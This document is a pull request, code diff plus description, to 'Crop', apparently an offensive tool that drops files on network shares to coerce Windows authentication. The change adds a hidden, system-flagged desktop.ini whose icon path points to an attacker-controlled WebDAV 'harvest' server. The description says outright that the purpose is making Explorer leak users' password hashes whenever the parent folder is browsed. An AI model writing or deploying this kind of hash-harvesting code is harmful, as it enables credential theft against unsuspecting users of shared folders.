### PR TITLE
Added support for folder icons to the Crop tool

### DIFF
--- a/crop/Crop/Crop.cs
+++ b/crop/Crop/Crop.cs
@@ -216,6 +216,11 @@ namespace Crop
                 "  </searchConnectorDescriptionList>\n" +
                 "</libraryDescription>";
 
+            var shellclassinfostr =
+                "[.ShellClassInfo]\n" +
+                "IconResource="+Config.targetPath+"\n";
+
+
             var output = "";
 
             if (Config.targetFilename.ToLower().EndsWith(".url"))
@@ -224,8 +229,14 @@ namespace Crop
                 output = searchconnectorstr;
             else if (Config.targetFilename.ToLower().EndsWith(".library-ms"))
                 output = librarymsstr;
+            else if (Config.targetFilename.ToLower()=="desktop.ini")
+                output = shellclassinfostr;
 
             System.IO.File.WriteAllText(destOut, output);
+            if (Config.targetFilename.ToLower() == "desktop.ini")
+            {
+                System.IO.File.SetAttributes(destOut, System.IO.File.GetAttributes(destOut) | System.IO.FileAttributes.Hidden | System.IO.FileAttributes.System);
+            }
         }
     }
 }

--- a/crop/Crop/Program.cs
+++ b/crop/Crop/Program.cs
@@ -15,6 +15,8 @@ namespace Crop
         {
             ShowBanner();
 
+            Console.WriteLine("Folder:");
+            Console.WriteLine("crop.exe <output folder> desktop.ini <WebDAV server> <LNK value>");
             Console.WriteLine("LNK File:");
             Console.WriteLine("crop.exe <output folder> <output filename> <WebDAV server> <LNK value> [options]");
             Console.WriteLine("crop.exe \\\\fileserver\\Common\\ crop.lnk \\\\workstation@8888\\harvest \\\\workstation@8888\\harvest");
@@ -40,7 +42,7 @@ namespace Crop
             Config.targetFilename = args[1].Trim();
             Config.targetPath = args[2].Trim();
 
-            if(!Config.targetLocation.EndsWith("\\"))
+            if (!Config.targetLocation.EndsWith("\\"))
                 Config.targetLocation = Config.targetLocation + "\\";
 
             if (Config.targetFilename.EndsWith(".lnk"))
@@ -138,6 +140,19 @@ namespace Crop
                         Console.WriteLine("[*] Writing file to: {0}", output);
                         Crop.CreateFileCrop(output);
                     }
+                }
+                catch (Exception e)
+                {
+                    Console.WriteLine(e.Message);
+                }
+            }
+            else if (Config.targetFilename.ToLower() == "desktop.ini")
+            {
+                try
+                {
+                    var output = Config.targetLocation + Config.targetFilename;
+                    Console.WriteLine("[*] Writing to: {0}", output);
+                    Crop.CreateFileCrop(output);
                 }
                 catch (Exception e)
                 {


### PR DESCRIPTION
Added support for folder icons by creating a desktop.ini in the target folder. An advantage I can see is that explorer will authenticate (leaking hashes) when the target folders parent folder is also browsed, which you may not always have write access to in order to drop the other file types.